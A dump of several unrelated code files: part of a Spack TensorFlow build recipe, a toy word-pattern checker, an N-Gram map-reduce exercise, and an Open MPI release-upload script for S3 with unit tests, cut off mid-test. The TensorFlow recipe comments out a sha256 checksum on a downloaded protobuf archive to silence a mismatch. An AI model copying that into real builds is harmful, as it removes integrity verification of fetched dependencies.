    version('1.3.0', '01c008c58d206324ef68cd5116a83965')
    version('1.2.0', '3f15746caabfd2583724258643fd1678')
    version('1.1.0', 'fb745649d33954c97d29b7acaffe7d65')
    version('1.0.0-rc2', 'a058a7e0ba2b9761cf2420c82d520049')
    version('0.10.0', 'b75cbd494d61a809af5ef25d7fba561b')

    depends_on('swig', type='build')

    # old tensorflow needs old bazel
    depends_on('bazel@0.19.0', type='build', when='@1.13.0:')
    depends_on('bazel@0.15.0', type='build', when='@1.8.0:1.12.0')
    depends_on('bazel@0.9.0', type='build', when='@1.5.0:1.6.0')
    depends_on('bazel@0.4.5', type='build', when='@1.2.0:1.3.0')
    depends_on('bazel@0.4.4:0.4.999', type='build', when='@1.0.0:1.1.0')
    depends_on('bazel@0.3.1:0.4.999', type='build', when='@:1.0.0')

    extends('python')
    # Python package dependencies; 'when' clauses track which tensorflow
    # releases started requiring each package.
    depends_on('py-setuptools', type=('build', 'run'))
    depends_on('py-numpy@1.11.0:', type=('build', 'run'))
    depends_on('py-six@1.10.0:', type=('build', 'run'))
    depends_on('py-protobuf@3.6.0:', type=('build', 'run'), when='@1.8.0:')
    depends_on('py-protobuf@3.3.0:', type=('build', 'run'), when='@1.3.0:1.6.0')
    depends_on('py-protobuf@3.0.0b2', type=('build', 'run'), when='@:1.2.0')
    depends_on('py-wheel', type=('build', 'run'))
    depends_on('py-mock@2.0.0:', type=('build', 'run'))
    depends_on('py-enum34@1.1.6:', type=('build', 'run'), when='@1.5.0: ^python@:3.3.999')
    depends_on('py-absl-py@0.1.6', type=('build', 'run'), when='@1.5.0:')
    depends_on('py-astor@0.1.6:', type=('build', 'run'), when='@1.6.0:')
    depends_on('py-gast@0.2.0:', type=('build', 'run'), when='@1.6.0:')
    depends_on('py-grpcio@1.8.6:', type=('build', 'run'), when='@1.6.0:')
    depends_on('py-termcolor@1.1.0:', type=('build', 'run'), when='@1.6.0:')
    depends_on('py-keras-applications@1.0.6:', type=('build', 'run'), when='@1.12.0:')
    depends_on('py-keras-preprocessing@1.0.5:', type=('build', 'run'), when='@1.12.0:')
    depends_on('py-h5py', type=('build', 'run'), when='@1.12.0:')
    depends_on('py-google-pasta@0.1.2:', type=('build', 'run'), when='@2.0.0:')

    patch('url-zlib.patch', when='@0.10.0')
    patch('crosstool.patch', when='@1.0.0-rc2')  # also needed on 0.10.0 when built with cuda!
    patch('sha-icu.patch', when='@1.13.1')

    variant('gcp', default=False,
            description='Enable Google Cloud Platform Support')
    variant('cuda', default=False,
            description='Enable CUDA Support')
    # openssl can be used to replace bazel's boringssl
    # e.g., when system openssl is available, boringssl runs into namespace conflicts
    variant('openssl', default=False,
            description='Build with openssl instead of Bazel boringssl')

    depends_on('cuda', when='+cuda')
    depends_on('cudnn', when='+cuda')
    depends_on('openssl@1.0.2:', type=('build', 'run'), when='@1.12.0:+openssl')

    def setup_environment(self, spack_env, run_env):
        """Expose the spack openssl libraries when replacing boringssl."""
        # needed when building with openssl instead of bazel's boringssl
        if self.spec.satisfies('@1.12.0:+openssl'):
            # libs.search_flags is '-L<path>'; slice off the leading '-L'
            openssl_lib_path = self.spec['openssl'].libs.search_flags[2:]
            spack_env.prepend_path('LD_LIBRARY_PATH', openssl_lib_path)
            run_env.prepend_path('LD_LIBRARY_PATH', openssl_lib_path)

    def install(self, spec, prefix):
        """Configure and build tensorflow with bazel, then install via setup.py.

        Tensorflow's interactive ./configure is driven entirely through
        environment variables; the long block below answers every question
        non-interactively for each supported release.
        """
        if '+gcp' in spec:
            env['TF_NEED_GCP'] = '1'
        else:
            env['TF_NEED_GCP'] = '0'
        env['PYTHON_BIN_PATH'] = str(spec['python'].prefix.bin) + '/python'
        env['SWIG_PATH'] = str(spec['swig'].prefix.bin)
        env['GCC_HOST_COMPILER_PATH'] = spack_cc
        if '+cuda' in spec:
            env['TF_NEED_CUDA'] = '1'
            env['TF_CUDA_VERSION'] = str(spec['cuda'].version)
            env['CUDA_TOOLKIT_PATH'] = str(spec['cuda'].prefix)
            env['TF_CUDNN_VERSION'] = str(spec['cudnn'].version)[0]
            env['CUDNN_INSTALL_PATH'] = str(spec['cudnn'].prefix)
            # NOTE(review): compute capabilities are hard-coded here --
            # adjust for the target GPUs if needed.
            env['TF_CUDA_COMPUTE_CAPABILITIES'] = '3.5,5.2'
        else:
            env['TF_NEED_CUDA'] = '0'
            env['TF_CUDA_VERSION'] = ''
            env['CUDA_TOOLKIT_PATH'] = ''
            env['TF_CUDNN_VERSION'] = ''
            env['CUDNN_INSTALL_PATH'] = ''
        if self.spec.satisfies('@1.0.0-rc2:'):
            env['CC_OPT_FLAGS'] = '-march=x86-64 -mtune=generic'
            env['TF_NEED_JEMALLOC'] = '0'
            env['TF_NEED_HDFS'] = '0'
            env['TF_ENABLE_XLA'] = '0'
            env['PYTHON_LIB_PATH'] = self.module.site_packages_dir
            env['TF_NEED_OPENCL'] = '0'
        # additional config options starting with version 1.2
        if self.spec.satisfies('@1.2.0:'):
            env['TF_NEED_MKL'] = '0'
            env['TF_NEED_VERBS'] = '0'
        # additional config options starting with version 1.3
        if self.spec.satisfies('@1.3.0:'):
            env['TF_NEED_MPI'] = '0'
        # additional config options starting with version 1.5
        if self.spec.satisfies('@1.5.0:'):
            env['TF_NEED_S3'] = '0'
            env['TF_NEED_GDR'] = '0'
            env['TF_NEED_OPENCL_SYCL'] = '0'
            env['TF_SET_ANDROID_WORKSPACE'] = '0'
            # env variable is somehow ignored -> brute force
            filter_file(r'if workspace_has_any_android_rule\(\)', r'if True', 'configure.py')
        # additional config options starting with version 1.6
        if self.spec.satisfies('@1.6.0:'):
            env['TF_NEED_KAFKA'] = '0'
        # additional config options starting with version 1.8
        if self.spec.satisfies('@1.8.0:'):
            env['TF_DOWNLOAD_CLANG'] = '0'
            env['TF_NEED_AWS'] = '0'
        if self.spec.satisfies('@1.12.0:'):
            env['TF_NEED_IGNITE'] = '0'
            env['TF_NEED_ROCM'] = '0'
        # boringssl error again, build against openssl instead via TF_SYSTEM_LIBS
        # does not work for tf < 1.12.0
        # (https://github.com/tensorflow/tensorflow/issues/25283#issuecomment-460124556)
        if self.spec.satisfies('+openssl'):
            env['TF_SYSTEM_LIBS'] = "boringssl"
        # set tmpdir to a non-NFS filesystem (because bazel uses ~/.cache/bazel)
        # TODO: This should be checked for non-nfsy filesystem, but the current
        #       best idea for it is to check
        #           subprocess.call(['stat', '--file-system', '--format=%T', tmp_path])
        #       to not be nfs. This is only valid for Linux and we'd like to
        #       stay at least also OSX compatible
        # Note: This particular path below /tmp/spack/tmp is required by the visionary container
        #       build flow:
        tmp_path = env.get('SPACK_TMPDIR', '/tmp/spack') + '/tf'
        mkdirp(tmp_path)
        env['TEST_TMPDIR'] = tmp_path
        env['HOME'] = tmp_path
        env["CC"] = env["SPACK_CC"]
        env["CXX"] = env["SPACK_CXX"]
        configure()
        # version dependent fixes
        if self.spec.satisfies('@1.3.0:1.5.0'):
            # checksum for protobuf that bazel downloads (@github) changed, comment out to avoid error
            # better solution: replace wrong checksums in workspace.bzl
            # wrong one: 6d43b9d223ce09e5d4ce8b0060cb8a7513577a35a64c7e3dad10f0703bf3ad93,
            # online: e5fdeee6b28cf6c38d61243adff06628baa434a22b5ebb7432d2a7fbabbdb13d
            filter_file(r'sha256 = "6d43b9d223ce09e5d4ce8b0060cb8a7513577a35a64c7e3dad10f0703bf3ad93"',
                        r'#sha256 = "6d43b9d223ce09e5d4ce8b0060cb8a7513577a35a64c7e3dad10f0703bf3ad93"',
                        'tensorflow/workspace.bzl')
            # starting with tensorflow 1.3, tensorboard becomes a dependency
            # (...but is not really needed? Tensorboard should depend on tensorflow, not the other way!)
            # -> remove from list of required packages
            filter_file(r"'tensorflow-tensorboard",
                        r"#'tensorflow-tensorboard",
                        'tensorflow/tools/pip_package/setup.py')
        if self.spec.satisfies('@1.5.0:'):
            # google cloud support seems to be installed on default, leading to boringssl error
            # manually set the flag to false to avoid installing gcp support
            # (https://github.com/tensorflow/tensorflow/issues/20677#issuecomment-404634519)
            filter_file(r'--define with_gcp_support=true',
                        r'--define with_gcp_support=false',
                        '.tf_configure.bazelrc')
        if self.spec.satisfies('@1.6.0:'):
            # tensorboard name changed
            filter_file(r"'tensorboard >=",
                        r"#'tensorboard >=",
                        'tensorflow/tools/pip_package/setup.py')
        if self.spec.satisfies('@1.8.0:'):
            # 1.8.0 and 1.9.0 aborts with numpy import error during python_api generation
            # somehow the wrong PYTHONPATH is used...set --distinct_host_configuration=false as a workaround
            # (https://github.com/tensorflow/tensorflow/issues/22395#issuecomment-431229451)
            filter_file('build --action_env TF_NEED_OPENCL_SYCL="0"',
                        'build --action_env TF_NEED_OPENCL_SYCL="0"\n'
                        'build --distinct_host_configuration=false\n'
                        'build --action_env PYTHONPATH="{0}"'.format(env['PYTHONPATH']),
                        '.tf_configure.bazelrc')
        if self.spec.satisfies('@1.12.0:+openssl'):
            # add link to spack-installed openssl libs (needed when spack openssl replaces boringssl)
            filter_file('-lssl', '-lssl '+self.spec['openssl'].libs.search_flags, 'third_party/systemlibs/boringssl.BUILD')
            filter_file('-lcrypto', '-lcrypto '+self.spec['openssl'].libs.search_flags, 'third_party/systemlibs/boringssl.BUILD')
        if self.spec.satisfies('@1.13.1'):
            # tensorflow_estimator is an API for tensorflow
            # tensorflow-estimator imports tensorflow during build, so tensorflow has to be set up first
            filter_file(r"'tensorflow_estimator >=",
                        r"#'tensorflow_estimator >=",
                        'tensorflow/tools/pip_package/setup.py')
        if self.spec.satisfies('@2.0.0:'):
            # now it depends on the nightly versions...
            filter_file(r"'tf-estimator-nightly >=",
                        r"#'tf-estimator-nightly >=",
                        'tensorflow/tools/pip_package/setup.py')
            filter_file(r"REQUIRED_PACKAGES\[i\] = 'tb-nightly >=",
                        r"pass #REQUIRED_PACKAGES\[i\] = 'tb-nightly >=",
                        'tensorflow/tools/pip_package/setup.py')
            filter_file(r"'tb-nightly >=",
                        r"#'tb-nightly >=",
                        'tensorflow/tools/pip_package/setup.py')
        if '+cuda' in spec:
            bazel('-c', 'opt', '--config=cuda', '//tensorflow/tools/pip_package:build_pip_package')
        else:
            bazel('-c', 'opt', '//tensorflow/tools/pip_package:build_pip_package')
        build_pip_package = Executable('bazel-bin/tensorflow/tools/pip_package/build_pip_package')
        build_pip_package(tmp_path)
        # using setup.py for installation
        # webpage suggests: sudo pip install /tmp/tensorflow_pkg/tensorflow-0.XYZ.whl
        mkdirp('_python_build')
        cd('_python_build')
        ln = which('ln')
        # expose the bazel build products and pip_package sources side by side
        # so that setup.py can operate on them in place
        for fn in glob("../bazel-bin/tensorflow/tools/pip_package/build_pip_package.runfiles/org_tensorflow/*"):
            ln('-s', fn, '.')
        for fn in glob("../tensorflow/tools/pip_package/*"):
            ln('-s', fn, '.')
        setup_py('install', '--prefix={0}'.format(prefix))
| 2.234375 | 2 |
YASDSSSS.py | lonomoji/vampy-portfolio | 0 | 12769690 | <filename>YASDSSSS.py<gh_stars>0
# Interactively ask the user for the word to classify.
print("What is yas?")
word = input()
def isYas(word):
    """Return True when the letters of *word* spell y+ a+ s+ (any case).

    Matches the original state machine exactly: non-alphabetic characters
    are skipped entirely (so "y1a2s" still counts), each of 'y', 'a' and
    's' may repeat, and all three must appear in order at least once.
    """
    letters = [ch.lower() for ch in word if ch.isalpha()]
    stages = 'yas'
    stage = -1  # index of the letter group we are currently consuming
    for ch in letters:
        if stage >= 0 and ch == stages[stage]:
            continue  # repetition of the current letter is fine
        if stage + 1 < len(stages) and ch == stages[stage + 1]:
            stage += 1  # advance to the next expected letter
        else:
            return False  # out-of-order or foreign letter
    # success only if we reached (and consumed) the final 's' group
    return stage == len(stages) - 1
# Bug fix: isYas() was previously called twice -- once with the result
# discarded, then again for the answer. The function is pure, so one
# call suffices.
answer = isYas(word)
print(answer)
| 4 | 4 |
0501-0600/0537-N-Gram (Map Reduce)/0537-N-Gram (Map Reduce).py | jiadaizhao/LintCode | 77 | 12769691 | <filename>0501-0600/0537-N-Gram (Map Reduce)/0537-N-Gram (Map Reduce).py
class NGram:
    # @param {int} n a integer
    # @param {str} string a string
    def mapper(self, _, n, string):
        """Emit (gram, 1) for every length-n substring of *string*, in order."""
        # Please use 'yield key, value' here
        last_start = len(string) - n + 1
        for start in range(last_start):
            yield string[start:start + n], 1

    # @param key is from mapper
    # @param values is a set of value with the same key
    def reducer(self, key, values):
        """Collapse all counts emitted for *key* into a single total."""
        # Please use 'yield key, value' here
        total = sum(values)
        yield key, total
| 3.203125 | 3 |
dist/uploadutils.py | bwbarrett/ompi-scripts | 1 | 12769692 | #!/usr/bin/python
#
# Copyright (c) 2018 Amazon.com, Inc. or its affiliates. All Rights
# Reserved.
#
# Additional copyrights may follow
#
import boto3
import botocore
import sys
import re
import os
import json
import tarfile
import hashlib
from io import StringIO
import datetime
import unittest
import mock
import posix
def __unique_assign(releaseinfo, key, value):
    """Store releaseinfo[key] = value, raising if a conflicting value exists.

    Used to guarantee that every file in a release agrees on the project,
    version, branch, etc.
    """
    current = releaseinfo.setdefault(key, value)
    if current != value:
        raise Exception('Found files from two %ss: %s %s' %
                        (key, releaseinfo[key], value))
def __compute_hashes(filename):
    """Helper function to compute MD5, SHA1 and SHA256 hashes of *filename*.

    Returns a dict with keys 'md5', 'sha1' and 'sha256' mapping to hex
    digest strings. The file is read in 64 KiB chunks so arbitrarily
    large artifacts can be hashed without loading them into memory.
    """
    hashers = {
        'md5': hashlib.md5(),
        'sha1': hashlib.sha1(),
        'sha256': hashlib.sha256(),
    }
    with open(filename, 'rb') as handle:
        for chunk in iter(lambda: handle.read(64 * 1024), b''):
            for hasher in hashers.values():
                hasher.update(chunk)
    return {name: hasher.hexdigest() for name, hasher in hashers.items()}
def __query_yes_no(question, default="yes"):
    """Ask *question* on stdout and return the user's yes/no answer as a bool.

    "default" is the presumed answer if the user just hits <Enter>.
    It must be "yes" (the default), "no" or None (meaning an answer is
    required of the user). The prompt is repeated until a recognizable
    answer is given.
    """
    valid = {"yes": True, "y": True, "ye": True,
             "no": False, "n": False}
    prompts = {None: " [y/n] ", "yes": " [Y/n] ", "no": " [y/N] "}
    if default not in prompts:
        raise ValueError("invalid default answer: '%s'" % default)
    prompt = prompts[default]
    while True:
        sys.stdout.write(question + prompt)
        choice = input().lower()
        if default is not None and choice == '':
            return valid[default]
        if choice in valid:
            return valid[choice]
        sys.stdout.write("Please respond with 'yes' or 'no' "
                         "(or 'y' or 'n').\n")
def parse_versions(filelist):
    """Parse the project name, branch, file basename, and version name from a file list.

    We're pretty conservative in this function, because it's an
    optimization over specifying a bunch of command line arguments
    explicitly. Add projects / regexes as necessary...

    :param filelist: iterable of release artifact filenames
    :returns: dict with keys 'project', 'branch', 'basename', 'version',
        plus 'build_unix_time' when at least one tarball is in the list
    :raises Exception: if a filename cannot be parsed or two files
        disagree about any field
    """
    releaseinfo = {}
    build_unix_time = 0
    for filename in filelist:
        if re.search(r'openmpi|OpenMPI', filename):
            m = re.search(r'openmpi\-([0-9a-zA-Z\.]+)(?:\.tar|\-[0-9]+\.src\.rpm|\.dmg.gz)',
                          filename)
            if m is None:
                # Windows installers use a different naming scheme
                m = re.search(r'OpenMPI_v([0-9a-zA-Z\.]+)\-[0-9]+_win', filename)
            if m is None:
                raise Exception('Could not parse Open MPI filename: %s' % (filename))
            # yes, we mean open-mpi for the project. We perhaps were
            # silly in naming the branch in S3.
            __unique_assign(releaseinfo, 'basename', 'openmpi')
            __unique_assign(releaseinfo, 'project', 'open-mpi')
            __unique_assign(releaseinfo, 'version', m.group(1))
        elif re.search('^hwloc-', filename):
            m = re.search(r'hwloc\-([0-9a-zA-Z\.]+)(?:\.tar|\-[0-9]+\.src\.rpm)',
                          filename)
            if m is None:
                # Windows zip builds use a different naming scheme
                m = re.search(r'hwloc-win[0-9]+-build-([0-9a-zA-Z\.]+)\.zip', filename)
            if m is None:
                raise Exception('Could not parse hwloc filename: %s' % (filename))
            __unique_assign(releaseinfo, 'basename', 'hwloc')
            __unique_assign(releaseinfo, 'project', 'hwloc')
            __unique_assign(releaseinfo, 'version', m.group(1))
        else:
            raise Exception('Could not parse %s' % (filename))
        # branch is always "v<major>.<minor>" of the version
        m = re.search(r'^[0-9]+\.[0-9]+', releaseinfo['version'])
        if m is None:
            raise Exception('Could not parse version %s' % (releaseinfo['version']))
        __unique_assign(releaseinfo, 'branch', 'v%s' % (m.group(0)))
        # Fixed: the pattern below was a non-raw string ('\.tar\.'),
        # which is an invalid escape sequence in modern Python.
        if build_unix_time == 0 and re.search(r'\.tar\.', filename):
            # rather than look at the ctime and mtime of the
            # tarball (which may change as tarballs are copied
            # around), look at the top level directory (first
            # entry in the tarball) for a mtime.
            # (The previous bare "except: raise" around this open was a
            # no-op and has been removed.)
            tar = tarfile.open(filename)
            build_unix_time = tar.getmembers()[0].mtime
    if build_unix_time != 0:
        releaseinfo['build_unix_time'] = build_unix_time
    return releaseinfo
def upload_files(s3_client, s3_bucket, s3_key_prefix, release_info, files, prompt):
    """Upload release artifacts plus a build-info JSON document to S3.

    :param s3_client: boto3 S3 client (or compatible duck-typed object)
    :param s3_bucket: name of the destination bucket
    :param s3_key_prefix: key prefix under which project/branch keys live
    :param release_info: dict from parse_versions() describing the release
    :param files: list of local file paths to upload
    :param prompt: one of 'ALWAYS_PROMPT', 'NO_OVERWRITE', 'NEVER_PROMPT',
        'ASSUME_NO', controlling whether/when the user is asked to confirm
    :raises Exception: if the key prefix does not look valid or *prompt*
        is not a recognized value
    """
    # first, verify that the key_prefix exists. We are chicken here
    # and won't create it.
    result = s3_client.list_objects_v2(Bucket = s3_bucket,
                                       Prefix = s3_key_prefix)
    if s3_bucket != 'open-mpi-scratch' and result['KeyCount'] == 0:
        # Bug fix: this message previously interpolated the undefined name
        # 'full_key_prefix', so the error path raised NameError instead of
        # the intended Exception.
        raise Exception('s3://%s/%s does not appear to be a valid prefix.' %
                        (s3_bucket, s3_key_prefix))
    # figure out if project and branch exist...
    project_key_path = '%s/%s' % (s3_key_prefix, release_info['project'])
    branch_key_path = '%s/%s' % (project_key_path, release_info['branch'])
    # print some release info
    print('Upload path: s3://%s/%s' % (s3_bucket, branch_key_path))
    print('Project: %s' % release_info['project'])
    print('Version: %s' % release_info['version'])
    print('Branch: %s' % release_info['branch'])
    print('Date: %s' % datetime.datetime.fromtimestamp(release_info['build_unix_time']))
    branch_result = s3_client.list_objects_v2(Bucket = s3_bucket,
                                              Prefix = branch_key_path)
    if branch_result['KeyCount'] == 0:
        project_result = s3_client.list_objects_v2(Bucket = s3_bucket,
                                                   Prefix = project_key_path)
        if project_result['KeyCount'] == 0:
            print(' * New project %s and branch %s' %
                  (release_info['project'], release_info['branch']))
        else:
            print(' * New branch %s' % (release_info['branch']))
    # and check for existing release
    build_filename = '%s/build-%s-%s.json' % (branch_key_path, release_info['basename'],
                                              release_info['version'])
    try:
        response = s3_client.get_object(Bucket = s3_bucket, Key = build_filename)
        buildinfo = json.load(response['Body'])
        buildinfo_found = True
    except botocore.exceptions.ClientError as e:
        code = e.response['Error']['Code']
        if code == 'NoSuchKey':
            # no existing build-info document; start from scratch
            buildinfo_found = False
        else:
            raise
        buildinfo = {}
        buildinfo['files'] = {}
    # check if we would overwrite a file and verify that would be ok...
    will_overwrite = False
    if buildinfo_found:
        print('Existing release found for %s %s' %
              (release_info['basename'], release_info['version']))
        print(' * Existing files that will not change:')
        for filename in buildinfo['files']:
            if not filename in files:
                print('   - %s' % filename)
        print(' * Existing files that will be overwritten:')
        for filename in buildinfo['files']:
            if filename in files:
                will_overwrite = True
                print('   - %s' % filename)
        print(' * New files:')
        for filename in files:
            filename = os.path.basename(filename)
            if not filename in buildinfo['files']:
                print('   - %s' % filename)
    else:
        print('New release for %s %s' %
              (release_info['basename'], release_info['version']))
        print(' * Files to upload:')
        for filename in files:
            filename = os.path.basename(filename)
            print('   - %s' % filename)
    print('')
    # prompt semantics: ALWAYS_PROMPT asks the user; NO_OVERWRITE aborts
    # silently only when an overwrite would occur; NEVER_PROMPT proceeds
    # unconditionally; ASSUME_NO always aborts (used by the unit tests).
    if prompt == 'ALWAYS_PROMPT':
        if not __query_yes_no('Continue?', 'no'):
            print('Aborting due to user selection')
            return
    elif prompt == 'NO_OVERWRITE':
        if will_overwrite:
            print('Aborting due to --yes and file overwrite')
            return
    elif prompt == 'NEVER_PROMPT':
        pass
    elif prompt == 'ASSUME_NO':
        print('Aborting due to ASSUME_NO')
        return
    else:
        raise Exception('Unknown Prompt value %d' % prompt)
    # build a build-info structure for the release, possibly building
    # on the old one...
    buildinfo['branch'] = release_info['branch']
    buildinfo['valid'] = True
    buildinfo['revision'] = release_info['version']
    buildinfo['build_unix_time'] = release_info['build_unix_time']
    buildinfo['delete_on'] = 0
    for filename in files:
        info = os.stat(filename)
        hashes = __compute_hashes(filename)
        fileinfo = {}
        fileinfo['sha1'] = hashes['sha1']
        fileinfo['sha256'] = hashes['sha256']
        fileinfo['md5'] = hashes['md5']
        fileinfo['size'] = info.st_size
        buildinfo['files'][os.path.basename(filename)] = fileinfo
    for filename in files:
        target_name = '%s/%s' % (branch_key_path, os.path.basename(filename))
        s3_client.upload_file(filename, s3_bucket, target_name)
    buildinfo_str = json.dumps(buildinfo)
    s3_client.put_object(Bucket = s3_bucket, Key = build_filename,
                         Body = buildinfo_str)
######################################################################
#
# Unit Test Code
#
######################################################################
def _test_stat(filename):
    """Stand-in for os.stat: every path reports a fixed st_size of 987654."""
    fake_size = 987654  # st_size is field index 6 of the stat tuple
    return posix.stat_result((0, 0, 0, 0, 0, 0, fake_size, 0, 0, 0))
def _test_compute_hashes(filename):
    """Stand-in for __compute_hashes returning fixed digests.

    Bug fix: upload_files() reads hashes['sha256'] as well as 'md5' and
    'sha1'; the mock previously omitted the 'sha256' key, so any mocked
    test that reached the hashing loop failed with KeyError.
    """
    retval = {}
    retval['md5'] = "ABC"
    retval['sha1'] = "ZYX"
    retval['sha256'] = "QRS"
    return retval
class _test_tarfile():
    """Stand-in for a tarfile whose first member has a fixed mtime."""

    def __init__(self):
        pass

    def getmembers(self):
        # Bug fix: this previously assigned mtime onto the tarfile.TarInfo
        # CLASS itself (info = tarfile.TarInfo; info.mtime = 12345), which
        # mutated shared global state for every other user of tarfile.
        # Return a fresh instance instead; consumers only read .mtime of
        # the first member.
        member = tarfile.TarInfo("fake-toplevel-dir")
        member.mtime = 12345
        return [member]

    @classmethod
    def open(cls, filename):
        return _test_tarfile()
class parse_versions_tests(unittest.TestCase):
    """Unit tests for parse_versions(), with tarfile.open stubbed out so no
    real tarball is ever opened."""

    @mock.patch('tarfile.open', _test_tarfile.open)
    def test_ompi_release(self):
        # A normal Open MPI release: tarballs plus a source rpm.
        filelist = ["openmpi-1.4.0.tar.gz",
                    "openmpi-1.4.0.tar.bz2",
                    "openmpi-1.4.0-1.src.rpm"]
        releaseinfo = parse_versions(filelist)
        self.assertEqual(releaseinfo['project'], "open-mpi",
                         releaseinfo['project'] + " != open-mpi")
        self.assertEqual(releaseinfo['basename'], "openmpi",
                         releaseinfo['basename'] + " != openmpi")
        self.assertEqual(releaseinfo['branch'], "v1.4",
                         releaseinfo['branch'] + " != v1.4")
        self.assertEqual(releaseinfo['version'], "1.4.0",
                         releaseinfo['version'] + " != 1.4.0")
        # build time comes from the stubbed tarball's first member mtime
        self.assertEqual(releaseinfo['build_unix_time'], 12345,
                         str(releaseinfo['build_unix_time']) + " != 12345")

    @mock.patch('tarfile.open', _test_tarfile.open)
    def test_ompi_release_second_srpm(self):
        # Respun src.rpm (-2) must not change the parsed version.
        filelist = ["openmpi-1.4.0.tar.gz",
                    "openmpi-1.4.0.tar.bz2",
                    "openmpi-1.4.0-2.src.rpm"]
        releaseinfo = parse_versions(filelist)
        self.assertEqual(releaseinfo['project'], "open-mpi",
                         releaseinfo['project'] + " != open-mpi")
        self.assertEqual(releaseinfo['basename'], "openmpi",
                         releaseinfo['basename'] + " != openmpi")
        self.assertEqual(releaseinfo['branch'], "v1.4",
                         releaseinfo['branch'] + " != v1.4")
        self.assertEqual(releaseinfo['version'], "1.4.0",
                         releaseinfo['version'] + " != 1.4.0")

    @mock.patch('tarfile.open', _test_tarfile.open)
    def test_ompi_binaries(self):
        # Binary artifacts (macOS dmg, Windows installer) parse to the
        # same release as the source artifacts.
        filelist = ["openmpi-1.4.0.tar.gz",
                    "openmpi-1.4.0.tar.bz2",
                    "openmpi-1.4.0-1.src.rpm",
                    "openmpi-1.4.0.dmg.gz",
                    "OpenMPI_v1.4.0-1_win64.exe"]
        releaseinfo = parse_versions(filelist)
        self.assertEqual(releaseinfo['project'], "open-mpi",
                         releaseinfo['project'] + " != open-mpi")
        self.assertEqual(releaseinfo['basename'], "openmpi",
                         releaseinfo['basename'] + " != openmpi")
        self.assertEqual(releaseinfo['branch'], "v1.4",
                         releaseinfo['branch'] + " != v1.4")
        self.assertEqual(releaseinfo['version'], "1.4.0",
                         releaseinfo['version'] + " != 1.4.0")

    @mock.patch('tarfile.open', _test_tarfile.open)
    def test_ompi_prerelease(self):
        # Release-candidate suffixes stay in the version string.
        filelist = ["openmpi-1.4.0rc1.tar.gz",
                    "openmpi-1.4.0rc1.tar.bz2",
                    "openmpi-1.4.0rc1-1.src.rpm"]
        releaseinfo = parse_versions(filelist)
        self.assertEqual(releaseinfo['project'], "open-mpi",
                         releaseinfo['project'] + " != open-mpi")
        self.assertEqual(releaseinfo['basename'], "openmpi",
                         releaseinfo['basename'] + " != openmpi")
        self.assertEqual(releaseinfo['branch'], "v1.4",
                         releaseinfo['branch'] + " != v1.4")
        self.assertEqual(releaseinfo['version'], "1.4.0rc1",
                         releaseinfo['version'] + " != 1.4.0rc1")

    @mock.patch('tarfile.open', _test_tarfile.open)
    def test_ompi_mixed_versions(self):
        # Mixing two versions in one file list must raise.
        filelist = ["openmpi-1.4.0.tar.gz",
                    "openmpi-1.4.1.tar.bz2",
                    "openmpi-1.4.0-1.src.rpm"]
        try:
            releaseinfo = parse_versions(filelist)
        except Exception as e:
            pass
        else:
            self.fail()

    @mock.patch('tarfile.open', _test_tarfile.open)
    def test_hwloc_release(self):
        filelist = ["hwloc-1.4.0.tar.gz",
                    "hwloc-1.4.0.tar.bz2",
                    "hwloc-win32-build-1.4.0.zip",
                    "hwloc-win64-build-1.4.0.zip"]
        releaseinfo = parse_versions(filelist)
        self.assertEqual(releaseinfo['project'], "hwloc",
                         releaseinfo['project'] + " != hwloc")
        self.assertEqual(releaseinfo['basename'], "hwloc",
                         releaseinfo['basename'] + " != hwloc")
        self.assertEqual(releaseinfo['branch'], "v1.4",
                         releaseinfo['branch'] + " != v1.4")
        self.assertEqual(releaseinfo['version'], "1.4.0",
                         releaseinfo['version'] + " != 1.4.0")

    @mock.patch('tarfile.open', _test_tarfile.open)
    def test_hwloc_prerelease(self):
        filelist = ["hwloc-1.4.0rc1.tar.gz",
                    "hwloc-1.4.0rc1.tar.bz2",
                    "hwloc-win32-build-1.4.0rc1.zip",
                    "hwloc-win64-build-1.4.0rc1.zip"]
        releaseinfo = parse_versions(filelist)
        self.assertEqual(releaseinfo['project'], "hwloc",
                         releaseinfo['project'] + " != hwloc")
        self.assertEqual(releaseinfo['basename'], "hwloc",
                         releaseinfo['basename'] + " != hwloc")
        self.assertEqual(releaseinfo['branch'], "v1.4",
                         releaseinfo['branch'] + " != v1.4")
        self.assertEqual(releaseinfo['version'], "1.4.0rc1",
                         releaseinfo['version'] + " != 1.4.0rc1")

    @mock.patch('tarfile.open', _test_tarfile.open)
    def test_hwloc_mixed_versions(self):
        # Conflicting tarball versions must raise.
        filelist = ["hwloc-1.4.0.tar.gz",
                    "hwloc-1.4.1.tar.bz2",
                    "hwloc-win32-build-1.4.0.zip",
                    "hwloc-win64-build-1.4.0.zip"]
        try:
            releaseinfo = parse_versions(filelist)
        except Exception as e:
            pass
        else:
            self.fail()

    @mock.patch('tarfile.open', _test_tarfile.open)
    def test_hwloc_mixed_versions2(self):
        # Conflicting zip version against the tarballs must raise too.
        filelist = ["hwloc-1.4.0.tar.gz",
                    "hwloc-1.4.0.tar.bz2",
                    "hwloc-win32-build-1.4.1.zip",
                    "hwloc-win64-build-1.4.0.zip"]
        try:
            releaseinfo = parse_versions(filelist)
        except Exception as e:
            pass
        else:
            self.fail()

    # we didn't teach the parser about netloc (because it's dead), so
    # this should fail
    def test_netloc(self):
        filelist = ["netloc-1.4.0.tar.gz",
                    "netloc-1.4.0.tar.bz2"]
        try:
            releaseinfo = parse_versions(filelist)
        except Exception as e:
            pass
        else:
            self.fail()
class upload_files_tests(unittest.TestCase):
    """Unit tests for upload_files(), using an in-memory fake S3 client."""

    class test_s3_client():
        """Duck-typed stand-in for a boto3 S3 client.

        Records every read and write so tests can assert on what
        upload_files() did. *Existing* controls whether get_object()
        pretends a build-info document already exists for 100.0.0rho1.
        """

        def __init__(self, path, Existing = False):
            self._readcount = 0          # number of read-style API calls
            self._file_write_list = []   # keys written via upload/put
            self._stream_write = ""      # accumulated put_object bodies
            self._path = path            # prefix all writes must live under
            self._existing = Existing

        def get_object(self, Bucket, Key):
            self._readcount += 1
            result = {}
            if not self._existing or Key != self._path + 'build-openmpi-100.0.0rho1.json':
                # mimic boto3's "no such key" ClientError
                response = {}
                response['Error'] = {}
                response['Error']['Code'] = 'NoSuchKey'
                raise botocore.exceptions.ClientError(response, 'get_object')
            # fabricate an existing build-info document with one file
            buildinfo = {}
            buildinfo['branch'] = 'v100.0'
            buildinfo['valid'] = True
            buildinfo['revision'] = '100.0.0rho1'
            buildinfo['build_unix_time'] = 314314
            buildinfo['delete_on'] = 0
            buildinfo['files'] = {}
            fileinfo = {}
            fileinfo['sha1'] = 'abc'
            fileinfo['md5'] = 'zyx'
